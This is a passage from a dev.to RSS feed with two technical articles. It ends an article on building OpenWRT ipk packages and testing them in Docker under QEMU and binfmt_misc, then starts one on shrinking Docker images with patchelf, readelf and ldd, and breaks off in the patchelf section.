&lt;p&gt;OpenWRT uses &lt;a href="https://openwrt.org/docs/techref/procd"&gt;procd&lt;/a&gt; as the init system — pid 1 process that launches all other processes in the system on boot. Procd is similar to SysV init, systemd, openrc etc., however, the syntax for the scripts is different. Here is an example of init script for a typical application that does not daemonizes itself and writes logs on standard output and standard error streams.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh /etc/rc.common&lt;/span&gt;
&lt;span class="nv"&gt;USE_PROCD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1
&lt;span class="nv"&gt;START&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;98 &lt;span class="c"&gt;# start order&lt;/span&gt;
&lt;span class="nv"&gt;STOP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;99 &lt;span class="c"&gt;# stop order&lt;/span&gt;
start_service&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    procd_open_instance
    procd_set_param &lt;span class="nb"&gt;command&lt;/span&gt; /usr/bin/myapp &lt;span class="c"&gt;# run the command without daemonizing&lt;/span&gt;
    procd_set_param respawn 0 7 0 &lt;span class="c"&gt;# respawn after 7 seconds delay&lt;/span&gt;
    procd_set_param stdout 1 &lt;span class="c"&gt;# redirect stdout to syslog&lt;/span&gt;
    procd_set_param stderr 1 &lt;span class="c"&gt;# redirect stderr to syslog&lt;/span&gt;
    procd_close_instance
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Procd has a lot of features including process jails, capabilities, etc. that are documented on &lt;a href="https://openwrt.org/docs/guide-developer/procd-init-scripts"&gt;OpenWRT web site&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;First-boot scripts
&lt;/h2&gt;

&lt;p&gt;OpenWRT firmware can come with packages pre-installed, and in this case the right place to generate firewall rules would be a &lt;em&gt;uci-defaults&lt;/em&gt; script. Such scripts are placed in &lt;code&gt;/etc/uci-defaults&lt;/code&gt; directory and are executed on the first system boot. After successful execution they are deleted by the system. These scripts do not have any special arguments, and generally you repeat post-install script contents there.&lt;/p&gt;

&lt;p&gt;Beware that distributing your package as part of OpenWRT firmware image means that your clients would not be able to reclaim free disk space by deleting the package: it will be deleted only in the overlay file system, but not in the underlying real file system.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Persist files across system upgrades
&lt;/h2&gt;

&lt;p&gt;Usually OpenWRT firmware is updated separately from the packages using &lt;code&gt;sysupgrade&lt;/code&gt; command. By default all the configuration files (that you specified in &lt;code&gt;CONTROL/conffiles&lt;/code&gt; file) are retained during the upgrade, however, your application might generate other files that you want to persist during the upgrade. To do so simply add &lt;code&gt;/lib/upgrade/keep.d/myapp&lt;/code&gt; file to your package that lists all directories and files that need to be persisted during the upgrade.&lt;/p&gt;

&lt;p&gt;The following file lists &lt;code&gt;/etc/myapp&lt;/code&gt; directory as the one that should be persisted during the system upgrade.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/etc/myapp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Package contents
&lt;/h2&gt;

&lt;p&gt;The final package contents would look like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
├── conffiles &lt;span class="c"&gt;# files that are persisted during system upgrade and that are not overwritten by package update&lt;/span&gt;
├── control &lt;span class="c"&gt;# package metadata&lt;/span&gt;
├── etc
│   ├── init.d
│   │   └── myapp &lt;span class="c"&gt;# init script&lt;/span&gt;
│   ├── myapp
│   │   └── myapp.conf &lt;span class="c"&gt;# app configuration&lt;/span&gt;
│   └── uci-defaults
│       └── myapp &lt;span class="c"&gt;# the script that runs on the first boot&lt;/span&gt;
├── lib
│   └── upgrade
│       └── keep.d
│           └── myapp &lt;span class="c"&gt;# the list of files that are persisted during system upgrade&lt;/span&gt;
├── postinst &lt;span class="c"&gt;# post-install script&lt;/span&gt;
├── postrm &lt;span class="c"&gt;# post-delete script&lt;/span&gt;
├── prerm &lt;span class="c"&gt;# pre-delete script&lt;/span&gt;
└── usr
    └── bin
        └── myapp &lt;span class="c"&gt;# application executable binary&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most of the contents can be generated with &lt;em&gt;fpm&lt;/em&gt; tool using &lt;em&gt;deb&lt;/em&gt; format as the output. Then the following script will convert &lt;em&gt;deb&lt;/em&gt; package to &lt;em&gt;ipk&lt;/em&gt; package.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;

cleanup&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-ex&lt;/span&gt;
&lt;span class="nb"&gt;trap &lt;/span&gt;cleanup EXIT
&lt;span class="nv"&gt;workdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;mktemp&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/deb &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL
&lt;span class="nb"&gt;cd&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/deb
&lt;span class="c"&gt;# unpack deb package&lt;/span&gt;
ar x &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk &lt;span class="nt"&gt;-xf&lt;/span&gt; data.tar.gz
&lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL &lt;span class="nt"&gt;-xf&lt;/span&gt; control.tar.gz
&lt;span class="c"&gt;# remove generated files&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL/md5sums
&lt;span class="c"&gt;# patch architecture for OpenWRT&lt;/span&gt;
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'s/Architecture: amd64/Architecture: x86_64/g'&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk/CONTROL/control
&lt;span class="c"&gt;# write ipk to /tmp&lt;/span&gt;
opkg-build &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$workdir&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;/ipk /tmp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How to test OpenWRT package with Docker
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frxl144yh58ilhw6nidj7.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frxl144yh58ilhw6nidj7.jpg" alt="Photo by Nick de Partee on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Similar to any other major Linux distribution OpenWRT maintains &lt;em&gt;rootfs&lt;/em&gt; &lt;a href="https://hub.docker.com/r/openwrt/rootfs"&gt;Docker images&lt;/a&gt; of root file systems, but it has a separate image for each target architecture. The documentation is on &lt;a href="https://github.com/openwrt/docker"&gt;Github&lt;/a&gt;. There is a separate tag for each architecture plus OpenWRT version combination. There are also &lt;em&gt;sdk&lt;/em&gt; and &lt;em&gt;imagebuilder&lt;/em&gt; images that are useful for building the package and the firmware image with the package pre-installed, but we will not discuss them here.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Testing packages for host architecture
&lt;/h2&gt;

&lt;p&gt;Rootfs images are useful to test your package installation/removal without investing into a router running OpenWRT (although, you should definitely invest in such a device to feel comfortable with doing system upgrades, working with web UI etc.). To install and remove the package use the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; /tmp:/tmp openwrt/rootfs


BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-01-22 12:01:31 UTC&lt;span class="o"&gt;)&lt;/span&gt; built-in shell &lt;span class="o"&gt;(&lt;/span&gt;ash&lt;span class="o"&gt;)&lt;/span&gt;

🌊 opkg update
...
🌊 opkg &lt;span class="nb"&gt;install&lt;/span&gt; /tmp/myapp.x86_64.ipk
Installing myapp &lt;span class="o"&gt;(&lt;/span&gt;1.0.0&lt;span class="o"&gt;)&lt;/span&gt; to root...
Configuring myapp.
🌊 opkg remove myapp
Removing package myapp from root...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker by default pulled and ran &lt;code&gt;openwrt/rootfs&lt;/code&gt; image that matches the host machine's architecture (x86_64). Then we updated the package index and installed our application from the &lt;code&gt;/tmp&lt;/code&gt; directory mounted from the host.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Testing packages for non-host architecture
&lt;/h2&gt;

&lt;p&gt;Testing for an architecture other than host's is more involved and requires running a virtual machine. Luckily for us &lt;a href="https://www.qemu.org/"&gt;QEMU&lt;/a&gt; and Linux's &lt;a href="https://docs.kernel.org/admin-guide/binfmt-misc.html"&gt;binfmt_misc&lt;/a&gt; makes it easy to do so (and without Docker even noticing!).&lt;/p&gt;

&lt;p&gt;QEMU is a tool that runs virtual machines on the host, and the most useful feature it has for us is the ability to transparently execute binary files compiled for an architecture other than the host's architecture. The following commands show how to do that on Ubuntu 22.04.3 LTS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# install QEMUE binaries that were statically compiled for each supported architecture&lt;/span&gt;
🌊 apt-get &lt;span class="nb"&gt;install &lt;/span&gt;qemu-user-static
&lt;span class="c"&gt;# list all available QEMU binaries&lt;/span&gt;
🌊 &lt;span class="nb"&gt;ls&lt;/span&gt; /usr/bin/qemu-&lt;span class="k"&gt;*&lt;/span&gt;static
...
/usr/bin/qemu-aarch64-static
...
/usr/bin/qemu-mips-static
...
&lt;span class="c"&gt;# execute a file compiled for mips&lt;/span&gt;
🌊 qemu-mips-static /tmp/file-compiled-for-mips
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To execute the binary compiled for architecture &lt;em&gt;X&lt;/em&gt; you just add &lt;code&gt;qemu-X-static&lt;/code&gt; before the command and that's it.&lt;/p&gt;

&lt;p&gt;Linux's Support for miscellaneous Binary Formats (&lt;em&gt;binfmt_misc&lt;/em&gt;) allows us to execute binaries without specifying any QEMU command. Upon execution the kernel detects the actual executable format of the file and executed it via the matching QEMU binary. The matching QEMU binaries and the «magic» bytes that distinguish a particular format from all others are specified in &lt;code&gt;/proc/sys/fs/binfmt_misc&lt;/code&gt; directory. On Ubuntu 22.04.3 LTS this directory is populated automatically after &lt;code&gt;qemu-user-static&lt;/code&gt; package is installed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 &lt;span class="nb"&gt;ls&lt;/span&gt; /proc/sys/fs/binfmt_misc
...
qemu-mips
...
qemu-aarch64
...
🌊 &lt;span class="nb"&gt;cat&lt;/span&gt; /proc/sys/fs/binfmt_misc/qemu-mips
enabled
interpreter /usr/libexec/qemu-binfmt/mips-binfmt-P
flags: POCF
offset 0
magic 7f454c46010201000000000000000000000200080000000000000000000000000000000000000000
mask ffffffffffffff00fefffffffffffffffffeffff0000000000000000000000000000000000000020
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now to run a foreign binary you don't need anything special: it runs the same way as a native binary on the system.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# you need matching entry in /proc/sys/fs/binfmt_misc for this to work&lt;/span&gt;
🌊 /tmp/file-compiled-for-mips
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since Docker is not a virtualization platform, but a process isolation tool, &lt;em&gt;binfmt-misc&lt;/em&gt; and QEMU allows you to transparently run Docker images that were built for other architectures. Again, you don't need anything special to do that. The following command runs OpenWRT &lt;em&gt;rootfs&lt;/em&gt; image for MIPS architecture.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; /tmp:/tmp openwrt/rootfs:mips_24kc
Unable to find image &lt;span class="s1"&gt;'openwrt/rootfs:mips_24kc'&lt;/span&gt; locally
mips_24kc: Pulling from openwrt/rootfs
2dd8ebde9a90: Pull &lt;span class="nb"&gt;complete
&lt;/span&gt;Digest: sha256:58d0bf8e15559e0a331e23915ed0221d678c8b2a569c58c0fa25a4f991e4beca
Status: Downloaded newer image &lt;span class="k"&gt;for &lt;/span&gt;openwrt/rootfs:mips_24kc
WARNING: The requested image platform &lt;span class="o"&gt;(&lt;/span&gt;linux/mips_24kc&lt;span class="o"&gt;)&lt;/span&gt; does not match the detected host platform &lt;span class="o"&gt;(&lt;/span&gt;linux/amd64/v4&lt;span class="o"&gt;)&lt;/span&gt; and no specific platform was requested


BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-01-26 09:19:40 UTC&lt;span class="o"&gt;)&lt;/span&gt; built-in shell &lt;span class="o"&gt;(&lt;/span&gt;ash&lt;span class="o"&gt;)&lt;/span&gt;

🌊 &lt;span class="nb"&gt;grep &lt;/span&gt;ARCH /etc/os-release
&lt;span class="nv"&gt;OPENWRT_ARCH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"mips_24kc"&lt;/span&gt;
🌊 opkg update
...
🌊 opkg &lt;span class="nb"&gt;install&lt;/span&gt; /tmp/myapp.mips_24kc.ipk
Installing myapp &lt;span class="o"&gt;(&lt;/span&gt;1.0.0&lt;span class="o"&gt;)&lt;/span&gt; to root...
Configuring myapp.
🌊 opkg remove myapp
Removing package myapp from root...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker warns that the image's architecture does not match the host's, but still successfully runs the image. This is where the power of QEMU and &lt;em&gt;binfmt-misc&lt;/em&gt; shows itself.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpess80j5vfn2run8qsf.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpess80j5vfn2run8qsf.jpg" alt="Photo by Justin Wilkens on Unsplash." width="640" height="360"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Building OpenWRT packages is similar to any other Linux distributions, but has unique requirements if you want to integrate your package with the rest of the system.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Generate firewall rules in post-install and &lt;em&gt;uci-defaults&lt;/em&gt; scripts and delete them in post-delete script.&lt;/li&gt;
&lt;li&gt;List files (in addition to configuration files) that need to be preserved during system upgrades in &lt;code&gt;/lib/upgrade/keep.d/myapp&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;Write &lt;em&gt;procd&lt;/em&gt;-compatible init script.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;opkg-build&lt;/code&gt; to generate ipk/opk package.&lt;/li&gt;
&lt;li&gt;Optionally, use &lt;em&gt;fpm&lt;/em&gt; tool to generate &lt;em&gt;deb&lt;/em&gt; package and then convert it to &lt;em&gt;ipk/opk&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Testing OpenWRT packages is also very similar to other Linux distributions, provided that you installed QEMU and used &lt;em&gt;binfmt-misc&lt;/em&gt; kernel feature to transparently run foreign binaries on your host. OpenWRT maintains root file system images for each combination of version and architecture all of which you can directly run on your host and in your CI/CD pipeline.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to get more content like this.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>docker</category>
      <category>devops</category>
      <category>openwrt</category>
    </item>
    <item>
      <title>How to reduce Docker image size for IoT devices</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 16 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/how-to-reduce-docker-image-size-for-iot-devices-3a34</link>
      <guid>https://dev.to/staex/how-to-reduce-docker-image-size-for-iot-devices-3a34</guid>
      <description>&lt;p&gt;IoT devices sometimes have too little resources to pull and run heavyweight Docker images. In this article we show how to reduce the size by &lt;strong&gt;36-91%&lt;/strong&gt; using patchelf and strace tools without recompiling containerized applications. We also show how to build minimal images for your own Rust, Go, C/C++ applications.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Why reduce Docker image size?&lt;/li&gt;
&lt;li&gt;
Patchelf.

&lt;ul&gt;
&lt;li&gt;
Motivating example: Stubby.&lt;/li&gt;
&lt;li&gt;
Results.&lt;/li&gt;
&lt;li&gt;
Limitations.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Strace.

&lt;ul&gt;
&lt;li&gt;
Motivating example: Home Assistant.&lt;/li&gt;
&lt;li&gt;
Results.&lt;/li&gt;
&lt;li&gt;
Limitations.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
You own images.

&lt;ul&gt;
&lt;li&gt;
Rust static binaries.&lt;/li&gt;
&lt;li&gt;
Go static binaries.&lt;/li&gt;
&lt;li&gt;
C/C++ static binaries.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Conclusion.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why reduce Docker image size?
&lt;/h1&gt;

&lt;p&gt;Docker image size and the number of layers affects how much memory and disk space a device needs to pull and unpack the image. Devices like Raspberry Pi Zero have too little resources to pull and unpack e.g. Home Assistant image, however, have more than enough resources to actually run it. Reducing the size improves Docker performance in such use cases. Also including only the files that are actually used by the application helps reduce the attack surface. This benefit goes beyond just IoT devices and is applicable to servers as well.&lt;/p&gt;

&lt;p&gt;It is easy to reduce the image size of the containerized applications that you developed yourself: just compile the static binary and include only this file in the final image. However, there are several approaches for third-party applications that do not require recompilation.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Patchelf
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0b6o8t64ys5fcz3e7rc.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0b6o8t64ys5fcz3e7rc.jpg" alt="Photo by Craig McLachlan on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the application in question is compiled into &lt;a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format"&gt;ELF&lt;/a&gt; binary (usually this is the case for C, C++, Fortran, Rust, Go etc.), you can use &lt;code&gt;patchelf&lt;/code&gt; tool to find all the libraries that the application uses and copy them into the final image.&lt;/p&gt;

&lt;p&gt;ELF — executable and linkable format — specifies program interpreter path (e.g. &lt;code&gt;/lib64/ld-linux-x86-64.so.2&lt;/code&gt; on x86_64 platform) and runtime search path abbreviated as rpath (e.g. &lt;code&gt;/lib64&lt;/code&gt;) among a multitude of other metadata.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Program interpreter&lt;/strong&gt; is used to dynamically load ELF file and all its dependencies (libraries) into the memory and execute it. On Linux you can do this manually: &lt;code&gt;/lib64/ld-linux-x86-64.so.2 /bin/sh&lt;/code&gt; is a «shortcut» for just &lt;code&gt;/bin/sh&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Runtime search path (rpath)&lt;/strong&gt; is used by the program interpreter to find the dependencies. On most Linux distributions (Guix and Nix are the only exceptions that I know) this path is empty and the interpreter searches for dependencies in hard-coded paths (e.g. &lt;code&gt;/lib64&lt;/code&gt;).&lt;br&gt;
We use &lt;code&gt;patchelf&lt;/code&gt; tool to modify the interpreter and rpath and &lt;code&gt;readelf&lt;/code&gt; to inspect ELF file. Another useful tool is &lt;code&gt;ldd&lt;/code&gt;. It shows both the interpreter and all the dependencies.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Debian&lt;/span&gt;
🌊 readelf &lt;span class="nt"&gt;--headers&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A2&lt;/span&gt; INTERP
  INTERP         0x0000000000000318 0x0000000000000318 0x0000000000000318
                 0x000000000000001c 0x000000000000001c  R      0x1
      &lt;span class="o"&gt;[&lt;/span&gt;Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
🌊 readelf &lt;span class="nt"&gt;--dynamic&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep &lt;/span&gt;RUNPATH
🌊 patchelf &lt;span class="nt"&gt;--set-interpreter&lt;/span&gt; /lib/ld-linux-x86-64.so.2 &lt;span class="nt"&gt;--set-rpath&lt;/span&gt; /lib /path/to/some/elf/binary
🌊 ldd /bin/sh
        linux-vdso.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007ffce0f91000&lt;span class="o"&gt;)&lt;/span&gt;
        libc.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /lib/x86_64-linux-gnu/libc.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007fedf9b66000&lt;span class="o"&gt;)&lt;/span&gt;
        /lib64/ld-linux-x86-64.so.2 &lt;span class="o"&gt;(&lt;/span&gt;0x00007fedf9d6d000&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see from the output rpath is empty on Debian and &lt;code&gt;/bin/sh&lt;/code&gt; depends only on libc. The output of the same commands on Guix is quite different. This is just an example, we will not dive into why Guix uses non-empty rpath.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Guix&lt;/span&gt;
🌊 readelf &lt;span class="nt"&gt;--headers&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A2&lt;/span&gt; INTERP
  INTERP         0x0000000000000318 0x0000000000400318 0x0000000000400318
                 0x0000000000000050 0x0000000000000050  R      0x1
      &lt;span class="o"&gt;[&lt;/span&gt;Requesting program interpreter: /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/ld-linux-x86-64.so.2]
🌊 readelf &lt;span class="nt"&gt;--dynamic&lt;/span&gt; /bin/sh | &lt;span class="nb"&gt;grep &lt;/span&gt;RUNPATH
 0x000000000000001d &lt;span class="o"&gt;(&lt;/span&gt;RUNPATH&lt;span class="o"&gt;)&lt;/span&gt;            Library runpath: &lt;span class="o"&gt;[&lt;/span&gt;/gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib:/gnu/store/bcc053jvsbspdjr17gnnd9dg85b3a0gy-ncurses-6.2.20210619/lib:/gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib:/gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib:/gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib/gcc/x86_64-unknown-linux-gnu/11.3.0/../../..]
🌊 ldd /bin/sh
        linux-vdso.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007ffe777f6000&lt;span class="o"&gt;)&lt;/span&gt;
        libreadline.so.8 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib/libreadline.so.8 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca9070000&lt;span class="o"&gt;)&lt;/span&gt;
        libhistory.so.8 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/lxfc2a05ysi7vlaq0m3w5wsfsy0drdlw-readline-8.1.2/lib/libhistory.so.8 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca9063000&lt;span class="o"&gt;)&lt;/span&gt;
        libncursesw.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/bcc053jvsbspdjr17gnnd9dg85b3a0gy-ncurses-6.2.20210619/lib/libncursesw.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8ff1000&lt;span class="o"&gt;)&lt;/span&gt;
        libgcc_s.so.1 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/930nwsiysdvy2x5zv1sf6v7ym75z8ayk-gcc-11.3.0-lib/lib/libgcc_s.so.1 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8fd7000&lt;span class="o"&gt;)&lt;/span&gt;
        libc.so.6 &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; /gnu/store/gsjczqir1wbz8p770zndrpw4rnppmxi3-glibc-2.35/lib/libc.so.6 &lt;span class="o"&gt;(&lt;/span&gt;0x00007efca8dd9000&lt;span class="o"&gt;)&lt;/span&gt;
